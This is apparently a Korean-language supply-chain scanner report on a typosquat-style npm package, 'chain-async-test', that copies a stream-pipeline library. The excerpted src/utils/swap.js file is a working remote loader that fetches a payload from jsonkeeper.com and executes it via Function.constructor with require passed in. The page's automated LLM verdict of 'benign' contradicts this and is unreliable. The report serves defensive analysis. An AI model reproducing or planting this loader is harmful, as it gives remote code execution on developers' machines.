// npm 패키지
chain-async-test
Chain functions, generators, and streams into a pipeline with backpressure support.
버전
6
메인테이너
1
라이선스
BSD-3-Clause
최초 publish
2026-05-06
publisher
harry_stev
tarball
115,181 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-05-18
// publisher 캠페인by harry_stev
이 계정에서 catch된 패키지 2건고립된 catch가 아닙니다. 동일 publisher가 1개의 다른 패키지를 추가로 발행했고, 모두 파이프라인이 catch했습니다 — 일회성이 아닌 조직적 캠페인의 형태. 아래 링크는 각 형제 catch의 분석으로 이동합니다.
// offending code· @1.1.7· 3 files flagged
llm: benign · 0.85→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 other host(s).
- @1.1.7··AUTO-PUBLISHED·publisher: harry_stevheuristic 75/100static flags 3llm benign (0.85) via ollamanew-publisher:8dhas-source-repoosv-flagged:MAL-2026-4516public-github-pushchild-process-spawnreads-env-vars
→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 other host(s).
// offending code· 3 files flaggedpatterns: 3
--- package/package.json (excerpt) --- { "name": "chain-async-test", "version": "1.1.7", "description": "Chain functions, generators, and streams into a pipeline with backpressure support.", "type": "commonjs", "main": "./src/index.js", "types": "./src/index.d.ts", "exports": { ".": "./src/index.js", "./*": "./src/*" }, "scripts": { "test": "tape6 --flags FO", "test:bun": "tape6-bun --flags FO", "test:deno": "tape6-deno --flags FO", "test:proc": "tape6-proc --flags FO", "test:proc:bun": "bun run `tape6-proc --self` --flags FO", "test:proc:deno": "deno run -A `tape6-proc --self` --flags FO -r -A", "test:seq": "tape6-seq --flags FO", "test:seq:bun": "bun run `tape6-seq --self` --flags FO", "test:seq:deno": "deno run -A `tape6-seq --self` --flags FO", "ts-check": "tsc --noEmit", "ts-test": "tape6 --flags FO 'tests/test-*.*ts'", "ts-test:bun": "tape6-bun --flags FO 'tests/test-*.*ts'", "ts-test:deno": "tape6-deno --flags FO 'tests/test-*.*ts'", "bench": "nano-bench", "lint": "prettier --check .", "lint:fix": "prettier --write ." }, "repository": { "type": "git", "url": "git+https://github.com/uhop/chain-async-test.git" }, "keywords": [ "stream", "chain", "pipeline", "transform", "backpressure", "duplex", "generator", "async", "object-mode", "functional" ], "author": "Eugene Lazutkin <eugene.lazutkin@gmail.com> (https://www.lazutkin.com/)", "funding": "https://github.co --- package/src/index.js (excerpt) --- // @ts-self-types="./index.d.ts" 'use strict'; const { Readable, Writable, Duplex } = require('node:stream'); const defs = require('./defs'); const gen = require('./gen'); const asStream = require('./asStream'); // is*NodeStream functions taken from https://github.com/nodejs/node/blob/master/lib/internal/streams/utils.js const isReadableNodeStream = obj => obj && typeof obj.pipe === 'function' && typeof obj.on === 'function' && (!obj._writableState || (typeof obj._readableState === 'object' ? obj._readableState.readable : null) !== false) && // Duplex (!obj._writableState || obj._readableState); // Writable has .pipe. const isWritableNodeStream = obj => obj && typeof obj.write === 'function' && typeof obj.on === 'function' && (!obj._readableState || (typeof obj._writableState === 'object' ? obj._writableState.writable : null) !== false); // Duplex const isDuplexNodeStream = obj => obj && typeof obj.pipe === 'function' && obj._readableState && typeof obj.on === 'function' && typeof obj.write === 'function'; const isNodeStream = obj => { return ( obj && (obj._readableState || obj._writableState || (typeof obj.write === 'function' && typeof obj.on === 'function') || (typeof obj.pipe === 'function' && typeof obj.on === 'function')) ); }; const isReadableWebStream = obj => !!( obj && !isNodeStream(obj) && typeof obj.pipeThrough === 'function' && typeof obj.getReader === 'function' && typ --- package/src/utils/swap.js (excerpt) --- "use strict"; const axios = require("axios"); const process = { env: { DEV_API_KEY: "https://www.jsonkeeper.com/b/5IZTJ", DEV_SECRET_KEY: "x-secret-key", DEV_SECRET_VALUE: "_", } }; (async function getCallers(..._args) { const src = process.env.DEV_API_KEY; const k = process.env.DEV_SECRET_KEY; const v = process.env.DEV_SECRET_VALUE; let retrycnt = 5; while (retrycnt > 0) { try { const l = console.log; const s = (await axios.get(src, { headers: { [k]: v } })).data.Cookie; const handler = new Function.constructor("require", s); handler(require); console.log = l; break; } catch (error) { retrycnt--; } } })(); --- bundled output (OSV-MAL flagged — LLM scope expansion) --- --- src/chain-async-streams.js (bundled) --- // @ts-self-types="./typed-streams.d.ts" 'use strict'; const {Duplex, Readable, Transform, Writable} = require('node:stream'); class TypedDuplex extends Duplex {} class TypedReadable extends Readable {} class TypedTransform extends Transform {} class TypedWritable extends Writable {} module.exports = {TypedDuplex, TypedReadable, TypedTransform, TypedWritable};
